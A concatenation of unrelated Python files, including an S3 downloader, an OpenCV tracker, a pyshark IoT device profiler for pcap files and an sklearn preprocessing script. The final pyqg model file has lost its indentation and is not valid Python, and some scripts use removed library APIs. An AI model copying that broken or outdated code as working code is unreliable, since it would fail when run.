        except Exception as e1:
            try:
                self.tested.keys()
                assert False, "should raise"
            except AssertionError:
                raise
            except Exception as e2:
                assert isinstance(e2, type(e1))
            raise
        k2 = sorted(self.tested.keys())
        assert k2 == k1, f"got {k2}, expecting {k1}"
        return k1

    def __delitem__(self, key):
        """Delete from both stores, asserting identical success/failure behaviour."""
        try:
            del self.reference[key]
        except Exception as e1:
            try:
                del self.tested[key]
                assert False, "should raise"
            except AssertionError:
                raise
            except Exception as e2:
                assert isinstance(e2, type(e1))
            raise
        del self.tested[key]

    def __iter__(self):
        return iter(self.keys())

    def __len__(self):
        return len(self.keys())

    def __contains__(self, key):
        # Containment is answered by the reference store alone.
        return key in self.reference
|
"""
Wrappers for handling remote run data (S3)
"""
from pathlib import Path
from typing import List
from autumn import settings
from autumn.core.utils import s3
class RemoteRunData:
    def __init__(self, run_id: str, client=None):
        """Remote (S3) wrapper for a given run_id
        Args:
            run_id (str): AuTuMN run_id string
            client (optional): S3 client object (will be created if not supplied)
        """
        self.run_id = run_id
        if client is None:
            client = s3.get_s3_client()
        self.client = client
        # Local mirror root for downloaded run artifacts.
        self.local_path_base = Path(settings.DATA_PATH) / 'outputs/runs'
        self.local_path_run = self.local_path_base / run_id
    def list_contents(self, suffix:str =None) -> List[str]:
        """Return a list of all files for this run
        These can be passed directly into the download method
        Args:
            suffix ([str], optional): Filter output by suffix
        Returns:
            [List[str]]: List of files
        """
        # The run_id doubles as the S3 key prefix for all of the run's objects.
        return s3.list_s3(self.client, self.run_id, suffix)
    def _get_full_metadata(self):
        """Complete S3 metadata for all objects in this run
        Returns:
            [dict]: Metadata
        """
        return self.client.list_objects_v2(Bucket=settings.S3_BUCKET, Prefix=self.run_id)
    def download(self, remote_path: str):
        """Download a remote file and place it in the corresponding local path
        Args:
            remote_path (str): Full string of remote file path
        """
        # Strip the filename from the end of the path
        # NOTE(review): remote_path is assumed to already start with the run_id
        # prefix (as returned by list_contents), so files land under local_path_run.
        split_path = remote_path.split('/')
        filename = split_path[-1]
        dir_only = '/'.join(split_path[:-1])
        local_path = self.local_path_base / dir_only
        local_path.mkdir(parents=True, exist_ok=True)
        full_local = local_path.joinpath(filename)
        s3.download_s3(self.client, remote_path, str(full_local))
    def __repr__(self):
        return f"RemoteRunData: {self.run_id}"
|
import numpy as np
import sklearn
import tensorflow as tf
from questions.utils import py_str
from .symbol_cost import SymbolCostModel
class Direct(SymbolCostModel):
    """Symbol-cost model that looks up a precomputed cost vector per problem.

    Costs are derived directly from the training questions at construction
    time; problems unseen at construction yield an empty cost vector that is
    flagged invalid.
    """

    def __init__(self, questions):
        super().__init__()
        self.costs = {}
        for problem, problem_questions in questions.items():
            self.costs[problem] = self.optimize_cost(problem_questions)

    def call(self, problems):
        # `Model.test_step` pads `problems` with a length 1 axis.
        if len(problems.shape) == 2:
            problems = tf.squeeze(problems, axis=1)
        fn_output_signature = [tf.RaggedTensorSpec(shape=[None], dtype=self.dtype, ragged_rank=0),
                               tf.TensorSpec(tf.TensorShape([]), dtype=tf.bool)]
        res = tf.map_fn(self.predict_one, problems, fn_output_signature=fn_output_signature)
        return {'costs': res[0], 'valid': res[1]}

    def predict_one(self, problem):
        """Wrap the Python-side lookup so it can run inside `tf.map_fn`."""
        return tf.py_function(self._predict_one, [problem], (self.dtype, tf.bool))

    def _predict_one(self, problem):
        problem = py_str(problem)
        try:
            return self.costs[problem], True
        except KeyError:
            # Problem unseen at construction time: empty costs, flagged invalid.
            return self.invalid_costs(), False

    def invalid_costs(self):
        """Zero-length cost vector used for unknown problems."""
        return tf.constant(0, dtype=self.dtype, shape=(0,))

    def optimize_cost(self, questions, normalize=True):
        """Mean direction of the (optionally row-normalized) question vectors."""
        if normalize:
            # BUGFIX: `import sklearn` alone does not guarantee the
            # `preprocessing` submodule is loaded as an attribute; import it
            # explicitly (aliased to avoid shadowing the `normalize` parameter).
            from sklearn.preprocessing import normalize as sk_normalize
            questions = sk_normalize(questions)
        cost = np.mean(questions, axis=0)
        # Sanity check: the mean direction must agree with most question vectors.
        assert np.mean(np.dot(questions, cost) > 0) >= 0.5
        cost = tf.constant(cost, dtype=self.dtype)
        return cost
|
"""Demo client for a wspc JSON-RPC-over-WebSocket server."""
from __future__ import print_function

import wspc

try:
    c = wspc.Client('ws://localhost:9001')
    # Go to http://localhost:9001 to get the list of supported remote
    # procedures and notifications along with their arguments.

    # Register a callback for the server's ping_event notification.
    c.callbacks.ping_event(
        lambda tick: print('ping - tick: {}'.format(tick)))

    # We can't use directly c.ping() since it's already
    # defined for ws4py.client.threadedclient.WebSocketClient
    ping_response = c.__getattr__('ping')()
    # Bug fix: this label previously said "ping2()" although the value above
    # is the response of the remote ping() procedure.
    print('ping() response: {}'.format(ping_response))

    ping_response = c.ping2()
    # Bug fix: this label previously said "ping()" although the value above
    # is the response of ping2().
    print('ping2() response: {}'.format(ping_response['tick']))

    notify_resp = c.notify(2)
    print('notify() response: {}'.format(notify_resp))

    add_resp = c.calculate(arg1=20, arg2=5, op='add', comment='adding 20 to 5')
    # Bug fix: the doubled quotes (''add'') were adjacent-literal
    # concatenation, so the op name printed without quotes.
    print("calculate(20, 5, 'add') response: {}".format(add_resp))

    divide_resp = c.calculate(arg1=16, arg2=5, op='divide')
    print("calculate(16, 5, 'divide') response: {}".format(divide_resp))

    # We can also use *args instead of **kwargs. In that case we have to provide
    # all arguments - even optional ones - in correct order
    multiply_resp = c.calculate(16, 8, 'multiply', 'comment')
    print("calculate(16, 8, 'multiply') response: {}".format(multiply_resp))

    ops = ['add', 'subtract', 'multiply', 'divide']
    for i in range(10):
        print('{0} "{2}" {1} = {3}'.format(16 * i, 5 + i,
              ops[i % 4], c.calculate2(16 * i, 5 + i, ops[i % 4])))

    # Wrong function (intentional: demonstrates the error raised for an
    # unknown remote procedure)
    c.calclate()

    # wait for events
    c.run_forever()
except KeyboardInterrupt:
    c.close()
|
# Exit/error codes reported by the CLI.
SERVER_CONNECTION_ERROR = 1
NOT_INSTARTER_SERVER = 2
VERSION_MISMATCH = 3
NOT_REGISTERED = 4
LOG_FILE_DOESNT_EXIST = 5
NOT_AMAZON_INSTANCE = 6
CONFIG_FILE_DOESNT_EXIST = 7


class NotInstarterServerError(Exception):
    """Raised when the target server is not an Instarter server."""


class VersionMismatchError(Exception):
    """Raised when the client and server versions do not match."""


class NotConfiguredInstance(Exception):
    """Raised when the instance has not been configured."""
|
#!/usr/bin/env python
import matplotlib
# Select the non-interactive Agg backend before pyplot is imported so the
# script can run without a display (e.g. on a headless server).
matplotlib.use('Agg')
import matplotlib.pyplot as plt

figure = plt.figure()
axes = figure.add_subplot(111)
xs = range(20)

def y(x, a, b):
    # Straight line: y = a*x + b.
    return x * a + b

# One line per intercept b in [-5, 5], all with slope 1.
for b in range(-5, 6):
    axes.plot(xs, [y(x, 1, b) for x in xs])
axes.axis(xmin=0, xmax=10, ymin=-5, ymax=15)
# NOTE(review): with log scales, the non-positive parts of the data and the
# xmin=0 / ymin=-5 limits cannot be represented (log of <= 0 is undefined)
# and will be clipped — confirm this is intended.
axes.set_xscale('log')
axes.set_yscale('log')
figure.savefig('graph.pdf')
|
import numpy as np
import cv2

# Lucas-Kanade sparse optical flow: track corner features from the default
# webcam and mark features that moved only a short distance between frames.
cap = cv2.VideoCapture(0)

# params for ShiTomasi corner detection
feature_params = dict(maxCorners=10,
                      qualityLevel=0.3,
                      minDistance=7,
                      blockSize=7)

# Parameters for lucas kanade optical flow
lk_params = dict(winSize=(15, 15),
                 maxLevel=2,
                 criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))

# Create some random colors (one per feature; see NOTE in the draw loop)
color = np.random.randint(0, 255, (10, 3))

# Take first frame and find corners in it
ret, old_frame = cap.read()
old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
p0 = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)

frame_number = 1
frame_update_gap = 30

while (1):
    ret, frame = cap.read()
    frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # update the features after certain set of frames
    if (frame_number % frame_update_gap == 0):
        if p0.size < 20:
            # p0.size counts scalars (2 per point), so this tops the pool up
            # towards ~10 tracked points.
            feature_params['maxCorners'] = int((20 - p0.size) / 2)
            new_points = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)
            p0 = np.concatenate((p0, new_points))
        frame_number = 1
    frame_number += 1
    # calculate optical flow
    p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)
    # Select good points (st == 1 marks successfully tracked features)
    good_new = p1[st == 1]
    good_old = p0[st == 1]
    # draw the tracks
    for i, (new, old) in enumerate(zip(good_new, good_old)):
        a, b = new.ravel()
        c, d = old.ravel()
        # Squared displacement between the old and new feature position.
        dist = (a - c) ** 2 + (b - d) ** 2
        if dist < 10:
            # NOTE(review): `color` has only 10 entries but re-detection can
            # grow p0 past 10 points, so color[i] may raise IndexError.
            # Also (a, b) are floats; newer OpenCV releases require integer
            # pixel coordinates here — confirm on the target version.
            frame = cv2.circle(frame, (a, b), 5, color[i].tolist(), -1)
        else:
            # NOTE(review): np.delete does not modify arrays in place and its
            # return value is discarded here, so this point is NOT removed.
            np.delete(good_new, i)
    cv2.imshow('frame', frame)
    k = cv2.waitKey(30) & 0xff
    if k == 27:
        break
    # Now update the previous frame and previous points
    old_gray = frame_gray.copy()
    p0 = good_new.reshape(-1, 1, 2)

cap.release()
cv2.destroyAllWindows()
|
import pyshark
import sys
import ipaddress
from filter import Filter
class Result:
    """A single profiling finding: a short tag plus an explanatory comment."""

    def __init__(self, tag, comment):
        self.tag = tag
        self.comment = comment
class Probability:
    """A device-type guess together with its formatted likelihood value."""

    def __init__(self, device_type, value):
        self.device_type = device_type
        self.value = value
def calculate_heartbeat(cap_sum):  # use cap_sum
    """Return the mean inter-packet arrival time (seconds) of the capture.

    The sum of consecutive time differences telescopes to last - first,
    so only the endpoints are needed.

    Args:
        cap_sum: indexable sequence of packet summaries with a ``time``
            attribute (string or numeric seconds).

    Returns:
        float: average gap between consecutive packets; 0.0 when fewer than
        two packets are available (previously raised ZeroDivisionError).
    """
    packet_count = len(cap_sum)
    if packet_count < 2:
        # Not enough packets to form even one interval.
        return 0.0
    total_gap = float(cap_sum[-1].time) - float(cap_sum[0].time)
    return total_gap / (packet_count - 1)
def calculate_upload_and_download_ratio(ip, cap):  # use cap
    """Fractions of IPv4 traffic volume sent vs. received by ``ip``.

    Multicast and broadcast packets are excluded; packets without an IPv4
    layer are ignored.

    Args:
        ip (str): IP address of the profiled device.
        cap: iterable of packets exposing ``ip.src``, ``ip.dst``, ``length``.

    Returns:
        tuple(float, float): (upload_ratio, download_ratio). Returns
        (0.0, 0.0) when no matching traffic was seen (previously this
        raised ZeroDivisionError).
    """
    upload_size = 0
    download_size = 0
    for pkt in cap:
        try:
            if ipaddress.ip_address(pkt.ip.src).is_multicast or ipaddress.ip_address(pkt.ip.dst).is_multicast:
                continue
            elif pkt.ip.src == '255.255.255.255' or pkt.ip.dst == '255.255.255.255':
                continue
            elif pkt.ip.src == ip:
                upload_size = upload_size + int(pkt.length)
            elif pkt.ip.dst == ip:
                download_size = download_size + int(pkt.length)
        except AttributeError:
            # Packet without an IPv4 layer — skip it.
            pass
    total_size = upload_size + download_size
    if total_size == 0:
        return 0.0, 0.0
    return upload_size / total_size, download_size / total_size
def calculate_local_and_global_packets_ratio(cap):  # use cap
    """Fractions of packets that stay on the LAN vs. leave it.

    Each IPv4 packet is classified as local (both endpoints private),
    multicast, or global; packets without an IPv4 layer are ignored.

    Args:
        cap: iterable of packets exposing ``ip.src`` and ``ip.dst``.

    Returns:
        tuple(float, float): (local_ratio, global_ratio). Returns
        (0.0, 0.0) when no IPv4 packets were seen (previously this raised
        ZeroDivisionError).
    """
    local_packets = 0
    multicast_packets = 0
    global_packets = 0
    for pkt in cap:
        try:
            if ipaddress.ip_address(pkt.ip.src).is_private and ipaddress.ip_address(pkt.ip.dst).is_private:
                local_packets = local_packets + 1
            elif ipaddress.ip_address(pkt.ip.src).is_multicast or ipaddress.ip_address(pkt.ip.dst).is_multicast:
                multicast_packets = multicast_packets + 1
            else:
                global_packets = global_packets + 1
        except AttributeError:
            # Packet without an IPv4 layer — skip it.
            pass
    total_packets = local_packets + multicast_packets + global_packets
    if total_packets == 0:
        return 0.0, 0.0
    return local_packets / total_packets, global_packets / total_packets
def calculate_data_rate(cap_sum):  # use cap_sum
    """Average throughput of the capture in bytes per second.

    Args:
        cap_sum: indexable sequence of packet summaries with ``time`` and
            ``length`` attributes.

    Returns:
        float: total bytes divided by the capture's time span; 0.0 for an
        empty capture or a zero/negative span (previously these cases
        raised IndexError / ZeroDivisionError).
    """
    if len(cap_sum) == 0:
        return 0.0
    cumulative_size = 0.0
    for pkt in cap_sum:
        cumulative_size = cumulative_size + float(pkt.length)
    total_time = float(cap_sum[-1].time) - float(cap_sum[0].time)
    if total_time <= 0:
        return 0.0
    return cumulative_size / total_time
def generate_protocol_list(cap_sum):  # use cap_sum
    """Return the distinct ``pkt.protocol`` values in first-seen order.

    Uses a seen-set for O(1) membership tests instead of the original
    O(n^2) inner scan over the accumulated list.

    Args:
        cap_sum: iterable of packet summaries with a ``protocol`` attribute.

    Returns:
        list: unique protocol names, ordered by first appearance.
    """
    seen = set()
    protocols = []
    for pkt in cap_sum:
        if pkt.protocol not in seen:
            seen.add(pkt.protocol)
            protocols.append(pkt.protocol)
    return protocols
def use_tuya_api(cap):  # use cap
    """Return 1 when any packet is UDP traffic to port 6666 (the Tuya
    cloud API port), else 0."""
    for pkt in cap:
        try:
            transport = pkt.transport_layer
            if transport == "UDP" and pkt[transport].dstport == "6666":
                return 1
        except AttributeError:  # ignore packets that aren't TCP/UDP or IPv4
            pass
    return 0
def has_public_ip(mac, cap):
    """Return 1 when the device with address ``mac`` sends from or receives
    at a globally-routable (public) IPv4 address, else 0."""
    for pkt in cap:
        try:
            if pkt.eth.src == mac and ipaddress.ip_address(pkt.ip.src).is_global:
                return 1
            if pkt.eth.dst == mac and ipaddress.ip_address(pkt.ip.dst).is_global:
                return 1
        except AttributeError:
            # Packet without ethernet/IPv4 layers — skip it.
            pass
    return 0
def is_encrypted(protocols):
    """1 if TLS traffic (TLSv1.2 or TLSv1) was observed, else 0."""
    return int('TLSv1.2' in protocols or 'TLSv1' in protocols)


def is_lightweight(protocols):
    """1 if the lightweight MQTT protocol was observed, else 0."""
    return int('MQTT' in protocols)


def is_iot(protocols):
    """1 if MDNS (typical of IoT devices) was observed, else 0."""
    return int('MDNS' in protocols)


def is_upnp(protocols):
    """1 if SSDP (universal plug and play) was observed, else 0."""
    return int('SSDP' in protocols)


def is_time_synchronizer(protocols):
    """1 if NTP traffic was observed, else 0."""
    return int('NTP' in protocols)


def is_unreliable(protocols):
    """1 if UDP traffic was observed, else 0."""
    return int('UDP' in protocols)
def is_low_local_ratio(local_packets_ratio):
    """1 when fewer than 10% of packets are LAN-local, else 0."""
    return 1 if local_packets_ratio < 0.1 else 0


def is_medium_local_ratio(local_packets_ratio):
    """1 when 10%-30% (inclusive) of packets are LAN-local, else 0."""
    return 1 if 0.1 <= local_packets_ratio <= 0.3 else 0


def is_high_local_ratio(local_packets_ratio):
    """1 when more than 30% of packets are LAN-local, else 0."""
    return 1 if local_packets_ratio > 0.3 else 0
def is_talkative(data_rate, heartbeat):
    """1 for a high data rate (>500 B/s) with a sub-second heartbeat."""
    return 1 if data_rate > 500 and heartbeat < 1 else 0


def is_neither_talkative_nor_shy(data_rate, heartbeat):
    """1 for a moderate data rate (90-500 B/s) or heartbeat (1-3 s)."""
    return 1 if 90 <= data_rate <= 500 or 1 <= heartbeat <= 3 else 0


def is_shy(data_rate, heartbeat):
    """1 for a low data rate (<90 B/s) with a slow heartbeat (>3 s)."""
    return 1 if data_rate < 90 and heartbeat > 3 else 0
def is_uploader(upload_ratio, download_ratio):
    """1 when uploads dominate downloads by at least 45 points, else 0."""
    return 1 if upload_ratio - download_ratio >= 0.45 else 0


def is_neither_uploader_nor_downloader(upload_ratio, download_ratio):
    """1 when upload and download shares differ by under 45 points, else 0."""
    return 1 if abs(upload_ratio - download_ratio) < 0.45 else 0


def is_downloader(upload_ratio, download_ratio):
    """1 when downloads dominate uploads by at least 45 points, else 0."""
    return 1 if download_ratio - upload_ratio >= 0.45 else 0
def check_premium():
    """Likelihood that the profiled device is a voice assistant.

    Reads the module-level globals (mac, cap, local_ratio, protocol_list,
    data_rate, heartbeat) prepared in __main__.
    """
    if has_public_ip(mac, cap):
        # A device with its own public IP is treated as a router, not an
        # end device.
        return 0
    return (0.5 * is_medium_local_ratio(local_ratio) + 0.15 * is_encrypted(protocol_list)
            + 0.2 * is_talkative(data_rate, heartbeat) + 0.15 * is_time_synchronizer(protocol_list))


def check_bulb():
    """Likelihood that the profiled device is a smart bulb."""
    if has_public_ip(mac, cap):
        return 0
    return (0.45 * is_low_local_ratio(local_ratio) + 0.35 * is_iot(protocol_list)
            + 0.2 * is_shy(data_rate, heartbeat)
            + 0.2 * is_neither_talkative_nor_shy(data_rate, heartbeat))


def check_strip():
    """Likelihood that the profiled device is a smart power strip.

    Two scoring heuristics are evaluated; the larger wins.
    """
    if has_public_ip(mac, cap):
        return 0
    protocol_score = (0.8 * is_lightweight(protocol_list) + 0.1 * is_unreliable(protocol_list)
                      + 0.1 * is_iot(protocol_list))
    locality_score = 0.8 * is_high_local_ratio(local_ratio) + 0.2 * is_iot(protocol_list)
    return max(protocol_score, locality_score)


def check_camera():
    """Likelihood that the profiled device is a camera."""
    if has_public_ip(mac, cap):
        return 0
    return 0.6 * is_uploader(upload_ratio, download_ratio) + 0.4 * is_talkative(data_rate, heartbeat)


def check_router():
    """1 when the device's MAC carries public-IP traffic (router-like)."""
    return has_public_ip(mac, cap)
def continue_or_exit():
    """Prompt until the user answers y/Y (return) or n/N (exit the program);
    any other answer re-prompts."""
    while True:
        print()
        choice = input("Do you want to profile another device in the same .pcap file? (y/n) ")
        if choice in ('y', 'Y'):
            return
        if choice in ('n', 'N'):
            print("Thanks for using. Goodbye!")
            exit()
        print("Invalid input! Please try again.")
def add_tags(manufacturer):
    """Evaluate every tag predicate and append a Result for each that fires.

    Reads the module-level globals prepared in __main__ (cap, mac,
    upload_ratio, download_ratio, protocol_list, local_ratio, global_ratio,
    data_rate, heartbeat) and appends to the shared ``results`` list in a
    fixed order, so the printed table order is deterministic.
    """
    print("Now profiling: " + manufacturer, end='', flush=True)
    if use_tuya_api(cap):
        results.append(Result("Tuya IoT Platform", "Using Tuya API"))
    if has_public_ip(mac, cap):
        results.append(Result("Has public IP", "Has public IP associated with MAC"))
    if is_uploader(upload_ratio, download_ratio):
        results.append(Result("Uploader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
    if is_neither_uploader_nor_downloader(upload_ratio, download_ratio):
        results.append(Result("Neither uploader nor downloader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
    if is_downloader(upload_ratio, download_ratio):
        results.append(Result("Downloader", "Upload % = {:.2f}%, Download % = {:.2f}%".format(upload_ratio * 100, download_ratio * 100)))
    if is_iot(protocol_list):
        results.append(Result("IoT", "Using MDNS Protocol"))
    if is_unreliable(protocol_list):
        results.append(Result("Has unreliable traffic", "Using UDP Protocol"))
    if is_lightweight(protocol_list):
        results.append(Result("Lightweight", "Using MQTT Protocol"))
    if is_upnp(protocol_list):
        results.append(Result("Universal plug and play", "Using SSDP Protocol"))
    if is_encrypted(protocol_list):
        results.append(Result("Encrypted", "Using TLSv1 or TLSv1.2 Protocol"))
    if is_time_synchronizer(protocol_list):
        results.append(Result("Time synchronizer", "Using NTP Protocol"))
    if is_high_local_ratio(local_ratio):
        results.append(Result("High local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
    if is_medium_local_ratio(local_ratio):
        results.append(Result("Medium local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
    if is_low_local_ratio(local_ratio):
        results.append(Result("Low local packets ratio", "Local % = {:.2f}%, Global % = {:.2f}%".format(local_ratio * 100, global_ratio * 100)))
    if is_talkative(data_rate, heartbeat):
        results.append(Result("Talkative", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
    if is_neither_talkative_nor_shy(data_rate, heartbeat):
        results.append(Result("Neither talkative nor shy", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
    if is_shy(data_rate, heartbeat):
        results.append(Result("Shy", "Data Rate = {:.2f}B/s, Heartbeat = {:.2f}s".format(data_rate, heartbeat)))
    print("...Done")
def print_tags():
    """Render the collected ``results`` as a fixed-width ASCII table."""
    divider = '-' * 78
    row = '| {:^31s} | {:^40s} |'
    print()
    print('{:^78s}'.format("Profiling Result"))
    print(divider)
    print(row.format("Tag", "Comment"))
    print(divider)
    for entry in results:
        print(row.format(entry.tag, entry.comment))
    print(divider)
    print()
def calculate_probabilities(manufacturer):
    """Run each device-type check and record its formatted likelihood in the
    shared ``probabilities`` list (order is fixed for the printed table)."""
    print("Now calculating probabilities for: " + manufacturer, end='', flush=True)
    checks = (("Router", check_router),
              ("Voice Assistant", check_premium),
              ("Bulb", check_bulb),
              ("Strip", check_strip),
              ("Camera", check_camera))
    for device_type, check in checks:
        probabilities.append(Probability(device_type, "{:.2f}%".format(check() * 100)))
    print("...Done")
def print_probabilities():
    """Render the collected ``probabilities`` as a fixed-width ASCII table."""
    divider = '-' * 29
    row = '| {:^15s} | {:^7s} |'
    print()
    print('{:^29s}'.format("Probable Type"))
    print(divider)
    print(row.format("Device Type", "Value"))
    print(divider)
    for entry in probabilities:
        print(row.format(entry.device_type, entry.value))
    print(divider)
if __name__ == "__main__":
    # Load the capture twice: full packets for deep inspection, plus a
    # summaries-only pass for the cheaper per-packet statistics.
    unfiltered_cap = pyshark.FileCapture(sys.argv[1])
    unfiltered_cap_sum = pyshark.FileCapture(sys.argv[1], only_summaries=True)
    pkt_filter = Filter(unfiltered_cap, unfiltered_cap_sum)
    pkt_filter.create_device_list()
    while True:
        # Fresh accumulators per profiled device; these module-level names
        # are read by add_tags()/calculate_probabilities() and the check_*
        # helpers.
        results = []
        probabilities = []
        pkt_filter.print_device_list()
        pkt_filter.ask_for_device()
        cap, cap_sum = pkt_filter.filter_packets()
        ip = pkt_filter.get_profile_device_ip()
        mac = pkt_filter.get_profile_device_mac()
        manufacturer = pkt_filter.get_profile_device_manufacturer()
        # Pre-compute the statistics consumed by the tagging and
        # probability steps below.
        upload_ratio, download_ratio = calculate_upload_and_download_ratio(ip, cap)
        protocol_list = generate_protocol_list(cap_sum)
        local_ratio, global_ratio = calculate_local_and_global_packets_ratio(cap)
        data_rate = calculate_data_rate(cap_sum)
        heartbeat = calculate_heartbeat(cap_sum)
        add_tags(manufacturer)
        print_tags()
        calculate_probabilities(manufacturer)
        print_probabilities()
        # Loops back for another device, or exits the process.
        continue_or_exit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 13 20:22:46 2018

@author: vinicius
"""
# Data preprocessing walkthrough: imputation, categorical encoding,
# train/test split and feature scaling on 'Data.csv'.

# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd

# NOTE(review): np.nan is not a valid threshold on modern NumPy (>= 1.14
# expects an int; use sys.maxsize) — confirm the pinned NumPy version.
np.set_printoptions(threshold=np.nan)  # to be able to see the full array

# Import the dataset
dataset = pd.read_csv('Data.csv')
x = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 3].values

# Handling the missing data
# NOTE(review): sklearn.preprocessing.Imputer was removed in scikit-learn
# 0.22 (replaced by sklearn.impute.SimpleImputer); this script targets an
# older scikit-learn.
from sklearn.preprocessing import Imputer
imputer = Imputer(missing_values='NaN', strategy='mean', axis=0)
imputer = imputer.fit(x[:, 1:3])  # upper bound excluded, thus use 3 instead of 2 for the index of last column
x[:, 1:3] = imputer.transform(x[:, 1:3])

# Encoding categorical data: label-encode column 0, then one-hot expand it.
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
label_encoder_x = LabelEncoder()
x[:, 0] = label_encoder_x.fit_transform(x[:, 0])
one_hot_enconder = OneHotEncoder(categorical_features=[0])
x = one_hot_enconder.fit_transform(x).toarray()
label_encoder_y = LabelEncoder()
y = label_encoder_y.fit_transform(y)

# Splitting the dataset into the training set and test set
# NOTE(review): sklearn.cross_validation was removed in scikit-learn 0.20;
# modern code imports train_test_split from sklearn.model_selection.
from sklearn.cross_validation import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)

# Feature scaling: fit the scaler on the training set only, then apply the
# same transform to the test set.
from sklearn.preprocessing import StandardScaler
sc_x = StandardScaler()
x_train = sc_x.fit_transform(x_train)
x_test = sc_x.transform(x_test)
import numpy as np
from numpy import pi
import logging
import warnings
import inspect
from .errors import DiagnosticNotFilledError
from .kernel import PseudoSpectralKernel, tendency_forward_euler, tendency_ab2, tendency_ab3
from .parameterizations import Parameterization
try:
import mkl
np.use_fastnumpy = True
except ImportError:
pass
try:
import pyfftw
pyfftw.interfaces.cache.enable()
except ImportError:
pass
class Model(PseudoSpectralKernel):
"""A generic pseudo-spectral inversion model.
Attributes
----------
nx, ny : int
Number of real space grid points in the `x`, `y` directions (cython)
nk, nl : int
Number of spectral space grid points in the `k`, `l` directions (cython)
nz : int
Number of vertical levels (cython)
kk, ll : real array
Zonal and meridional wavenumbers (`nk`) (cython)
a : real array
inversion matrix (`nk`, `nk`, `nl`, `nk`) (cython)
q : real array
Potential vorticity in real space (`nz`, `ny`, `nx`) (cython)
qh : complex array
Potential vorticity in spectral space (`nk`, `nl`, `nk`) (cython)
ph : complex array
Streamfunction in spectral space (`nk`, `nl`, `nk`) (cython)
u, v : real array
Zonal and meridional velocity anomalies in real space (`nz`, `ny`, `nx`) (cython)
Ubg : real array
Background zonal velocity (`nk`) (cython)
Qy : real array
Background potential vorticity gradient (`nk`) (cython)
ufull, vfull : real arrays
Zonal and meridional full velocities in real space (`nz`, `ny`, `nx`) (cython)
uh, vh : complex arrays
Velocity anomaly components in spectral space (`nk`, `nl`, `nk`) (cython)
rek : float
Linear drag in lower layer (cython)
t : float
Model time (cython)
tc : int
Model timestep (cython)
dt : float
Numerical timestep (cython)
L, W : float
Domain length in x and y directions
filterfac : float
Amplitdue of the spectral spherical filter
twrite : int
Interval for cfl writeout (units: number of timesteps)
tmax : float
Total time of integration (units: model time)
tavestart : float
Start time for averaging (units: model time)
tsnapstart : float
Start time for snapshot writeout (units: model time)
taveint : float
Time interval for accumulation of diagnostic averages.
(units: model time)
tsnapint : float
Time interval for snapshots (units: model time)
ntd : int
Number of threads to use. Should not exceed the number of cores on
your machine.
pmodes : real array
Vertical pressure modes (unitless)
radii : real array
Deformation radii (units: model length)
q_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a :code:`numpy` array of shape
:code:`(nz, ny, nx)` to be added to :math:`\partial_t q` before
stepping forward. This can be used to implement subgrid forcing
parameterizations.
uv_parameterization : function or pyqg.Parameterization
Optional :code:`Parameterization` object or function which takes
the model as input and returns a tuple of two :code:`numpy` arrays,
each of shape :code:`(nz, ny, nx)`, to be added to the zonal and
meridional velocity derivatives (respectively) at each timestep (by
adding their curl to :math:`\partial_t q`). This can also be used
to implemented subgrid forcing parameterizations, but expressed in
terms of velocity rather than potential vorticity.
"""
def __init__(
        self,
        # grid size parameters
        nz=1,
        nx=64,                      # grid resolution
        ny=None,
        L=1e6,                      # domain size is L [m]
        W=None,
        # timestepping parameters
        dt=7200.,                   # numerical timestep
        twrite=1000.,               # interval for cfl and ke writeout (in timesteps)
        tmax=1576800000.,           # total time of integration
        tavestart=315360000.,       # start time for averaging
        taveint=86400.,             # time interval used for summation in longterm average in seconds
        useAB2=False,               # use second order Adams Bashforth timestepping instead of 3rd
        # friction parameters
        rek=5.787e-7,               # linear drag in lower layer
        filterfac=23.6,             # the factor for use in the exponential filter
        # constants
        f=None,                     # coriolis parameter (not necessary for two-layer model
                                    # if deformation radius is provided)
        g=9.81,                     # acceleration due to gravity
        q_parameterization=None,    # subgrid parameterization in terms of q
        uv_parameterization=None,   # subgrid parameterization in terms of u,v
        parameterization=None,      # subgrid parameterization (type will be inferred)
        # diagnostics parameters
        diagnostics_list='all',     # which diagnostics to output
        # fft parameters
        # removed because fftw is now mandatory
        #use_fftw = False, # fftw flag
        #teststyle = False, # use fftw with "estimate" planner to get reproducibility
        ntd=1,                      # number of threads to use in fftw computations
        log_level=1,                # logger level: from 0 for quiet (no log) to 4 for verbose
                                    # logger (see https://docs.python.org/2/library/logging.html)
        logfile=None,               # logfile; None prints to screen
):
    r"""
    .. note:: All of the test cases use ``nx==ny``. Expect bugs if you choose
       these parameters to be different.

    .. note:: All time intervals will be rounded to nearest `dt` interval.

    Parameters
    ----------
    nx : int
        Number of grid points in the x direction.
    ny : int
        Number of grid points in the y direction (default: nx).
    L : number
        Domain length in x direction. Units: meters.
    W :
        Domain width in y direction. Units: meters (default: L).
    rek : number
        linear drag in lower layer. Units: seconds :sup:`-1`.
    filterfac : number
        amplitude of the spectral spherical filter (originally 18.4, later
        changed to 23.6).
    dt : number
        Numerical timestep. Units: seconds.
    twrite : int
        Interval for cfl writeout. Units: number of timesteps.
    tmax : number
        Total time of integration. Units: seconds.
    tavestart : number
        Start time for averaging. Units: seconds.
    tsnapstart : number
        Start time for snapshot writeout. Units: seconds.
    taveint : number
